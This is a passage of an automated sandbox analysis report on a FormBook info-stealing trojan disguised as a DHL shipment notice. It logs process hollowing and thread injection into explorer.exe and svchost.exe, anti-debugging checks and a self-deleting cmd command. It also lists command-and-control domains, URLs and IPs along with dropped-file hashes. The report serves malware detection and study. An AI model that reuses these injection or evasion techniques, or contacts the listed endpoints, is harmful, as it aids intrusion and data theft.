          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030D8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0040ACE0 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D743CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D7439B SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00D743CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00D7439B SetUnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.ultrakill.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80
          Source: C:\Windows\explorer.exeNetwork Connect: 142.250.185.115 80
          Source: C:\Windows\explorer.exeDomain query: www.rtpholywin99.com
          Source: C:\Windows\explorer.exeDomain query: www.keilaniclothing.com
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 2F0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeThread register set: target process: 3616
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 3616
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeProcess created: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\aeokw.exe"
          Source: explorer.exe, 00000005.00000000.284344816.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.290054860.0000000005E60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.342712114.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.299103436.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.284344816.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.342712114.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.284344816.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.342712114.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.263202422.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager,
          Source: explorer.exe, 00000005.00000000.284344816.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.342712114.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.263202422.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D73283 cpuid
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D73EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API          		Path Interception1
          Access Token Manipulation          		1
          Rootkit          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Credential API Hooking          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts512
          Process Injection          		2
          Virtualization/Sandbox Evasion          		LSASS Memory151
          Security Software Discovery          		Remote Desktop Protocol1
          Archive Collected Data          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Access Token Manipulation          		Security Account Manager2
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Clipboard Data          		Automated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
          Process Injection          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information          		Cached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Software Packing          		DCSync114
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 626119 Sample: DHL SHIPMENT NOTIFICATION 1... Startdate: 13/05/2022 Architecture: WINDOWS Score: 100 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Antivirus detection for URL or domain 2->51 53 5 other signatures 2->53 11 DHL SHIPMENT NOTIFICATION 1146789443.exe 19 2->11         started        process3 file4 31 C:\Users\user\AppData\Local\Temp\aeokw.exe, PE32 11->31 dropped 14 aeokw.exe 11->14         started        process5 signatures6 65 Tries to detect virtualization through RDTSC time measurements 14->65 17 aeokw.exe 14->17         started        process7 signatures8 39 Modifies the context of a thread in another process (thread injection) 17->39 41 Maps a DLL or memory area into another process 17->41 43 Sample uses process hollowing technique 17->43 45 Queues an APC in another process (thread injection) 17->45 20 explorer.exe 17->20 injected process9 dnsIp10 33 shops.myshopify.com 23.227.38.74, 49775, 80 CLOUDFLARENETUS Canada 20->33 35 www.ultrakill.xyz 3.64.163.50, 49777, 80 AMAZON-02US United States 20->35 37 3 other IPs or domains 20->37 55 System process connects to network (likely due to code injection or exploit) 20->55 57 Performs DNS queries to domains with low reputation 20->57 24 svchost.exe 20->24         started        signatures11 process12 signatures13 59 Modifies the context of a thread in another process (thread injection) 24->59 61 Maps a DLL or memory area into another process 24->61 63 Tries to detect virtualization through RDTSC time measurements 24->63 27 cmd.exe 1 24->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          DHL SHIPMENT NOTIFICATION 1146789443.exe43%VirustotalBrowse
          DHL SHIPMENT NOTIFICATION 1146789443.exe49%ReversingLabsWin32.Trojan.FormBook
          DHL SHIPMENT NOTIFICATION 1146789443.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.0.aeokw.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.aeokw.exe.12a0000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.aeokw.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.aeokw.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.aeokw.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.ultrakill.xyz/amdf/?oTsXW=bHtTbh8HU&9rF=2pnwrPnaayjLTa+dMDr3ioSS0RS/WyH1Gjote8OZi1oxTz0HZpyyfRSy0TFJ31yfLnqh0%Avira URL Cloudsafe
          http://www.keilaniclothing.com/amdf/?9rF=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1Udvzfmdn1m&oTsXW=bHtTbh8HU0%Avira URL Cloudsafe
          http://www.ultrakill.xyz/0%Avira URL Cloudsafe
          http://www.rtpholywin99.com/amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBx100%Avira URL Cloudmalware
          www.lgf7.com/amdf/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ghs.google.com
          		142.250.185.115
          		truefalse
            		high
            www.ultrakill.xyz
            		3.64.163.50
            		truetrue
              		unknown
              shops.myshopify.com
              		23.227.38.74
              		truetrue
                		unknown
                www.rtpholywin99.com
                		unknown
                		unknowntrue
                  		unknown
                  www.keilaniclothing.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.ultrakill.xyz/amdf/?oTsXW=bHtTbh8HU&9rF=2pnwrPnaayjLTa+dMDr3ioSS0RS/WyH1Gjote8OZi1oxTz0HZpyyfRSy0TFJ31yfLnqhtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.keilaniclothing.com/amdf/?9rF=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1Udvzfmdn1m&oTsXW=bHtTbh8HUtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.rtpholywin99.com/amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBxfalse
                    • Avira URL Cloud: malware
                    		unknown
                    www.lgf7.com/amdf/true
                    • Avira URL Cloud: malware
                    		low

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.ultrakill.xyz/svchost.exe, 00000011.00000002.515898561.0000000003A1F000.00000004.10000000.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://nsis.sf.net/NSIS_ErrorErrorDHL SHIPMENT NOTIFICATION 1146789443.exefalse
                      		high

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      23.227.38.74
                      		shops.myshopify.comCanada
                      		13335CLOUDFLARENETUStrue
                      3.64.163.50
                      		www.ultrakill.xyzUnited States
                      		16509AMAZON-02UStrue
                      142.250.185.115
                      		ghs.google.comUnited States
                      		15169GOOGLEUSfalse

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:626119
                      Start date and time: 13/05/202216:08:112022-05-13 16:08:11 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 8m 58s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:DHL SHIPMENT NOTIFICATION 1146789443.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:25
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@9/4@3/3
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 59.5% (good quality ratio 54.6%)
                      • Quality average: 75.6%
                      • Quality standard deviation: 31.3%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Adjust boot time
                      • Enable AMSI

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, store-images.s-microsoft.com, login.live.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                      • Not all processes where analyzed, report is missing behavior information

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASNs

                      No context

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Temp\1f1tfctqz7e9

                      Download File
                      Process:C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):189439
                      Entropy (8bit):7.991246452644623
                      Encrypted:true
                      SSDEEP:3072:nSqfxKHsiwZNRIuqSFpjwuq/D7YfJs8N8p321SwWvM0rscdXjQ4sHnOBfoXdpz4O:nxfxAwWS39q6JsM8U1dWvo+XjZ6dpz8I
                      MD5:5C1283288CC16D3EAAFFF3A0C53CB189
                      SHA1:15804A12C0184AC1F12B053B9640326E1D865F92
                      SHA-256:321FDA60076CDB1D552492333599861F583B01A2F3774F84B3991EE58036AE4F
                      SHA-512:A7FD921DEC02CFFD94AF98CCC8964FEE343BF22DD541939685E85955AC6CC14EEAF661438DFD8B4F45B1852259C98C8BA153D322760F0D033C761B7382A32B9D
                      Malicious:false
                      Reputation:low
                      Preview:.y.oJ_.....{.:./..i.I..i..,|..-..A<...-..VK].M...,....R{._\.D....o...L....Gs.. ..S[..n~.]..?..G...t.X....I.)O..B..P,<.;=..:lj.\*(......C..?.5..>}+.]...WU....|4..a...T.".d....8G9(<.#9...X.......Q.+...%.v..d......z.-.y...<...%c"^.:...=...7..EGE.Z....._..S...2(...i.........Sm.-..A<J..-..V.].M...0....R{._\....... ^..XY..Q...J..5p..W..:.L..qPx....Z.4p.X.'Y.P,<.;=&.....w...-..[L......6q+l|.il..p...Z.;.\....".d.....Zs.#.#96.X....#.HwQU+...%.n.M..'.s}ob.-.y...<.B]%cF^.:..=..7..EG..Z..H.._...S...2(.E.i.........S..-..A<...-..VK].M...,....R{._\....... ^..XY..Q...J..5p..W..:.L..qPx....Z.4p.X.'Y.P,<.;=&.....w...-..[L......6q+l|.il..p...Z.;.\....".d....8G9(<.#9#..X....#z.wQ.+...%.n.M..'..}oz.-.y...<.B]%cF^.:..=..7..EG..Z..H.._...S...2(.E.i.........S..-..A<...-..VK].M...,....R{._\....... ^..XY..Q...J..5p..W..:.L..qPx....Z.4p.X.'Y.P,<.;=&.....w...-..[L......6q+l|.il..p...Z.;.\....".d....8G9(<.#9#..X....#z.wQ.+...%.n.M..'..}oz.-.y...<

                      C:\Users\user\AppData\Local\Temp\aeokw.exe

                      Download File
                      Process:C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):80384
                      Entropy (8bit):6.294435627366989
                      Encrypted:false
                      SSDEEP:1536:GuTaC+v1M4fr0oxAomP3cX/4pi2sWjcdxpI:Pa524D1/ui5xy
                      MD5:6F70881E0183CE9F78E300CF2C8DC48E
                      SHA1:D2D766CB5654AA367682C41FBC177A146D047D2C
                      SHA-256:D3AFB887DFF82AA5A52C4AD2008DAC9126B854EA2E3EFC729AB27CFAFABA39C2
                      SHA-512:6C5FE5B2A594606B26E5E4D2E05995EB39CC25C0B461AD2882503D45E7705524A6EA9A2E99CB76FB2FFFC0DD992AE1F43153C29ED3E5B98ED68F85EF74807208
                      Malicious:true
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w...w...w...%`..w...%^..w...%a.w......w...w..w..p....w..p.~..w..p....w..Rich.w..................PE..L...+.}b............................7.............@.......................................@..................................$.......p..................................T...............................@............................................text...U........................... ..`.rdata...N.......P..................@..@.data... 1...0......................@....rsrc........p.......*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\fnnok

                      Download File
                      Process:C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):4986
                      Entropy (8bit):6.153505769820207
                      Encrypted:false
                      SSDEEP:96:2JQ3L3rEeKzJzFuuvSKQZ8LFVmhJMYLX2lGNfvw7w4Ihl4FELbgTht7:3wnthuuKKGIchJMYLX2lGSIhl4egThp
                      MD5:F10D9B65FF4DE8235C81704DF991DD2A
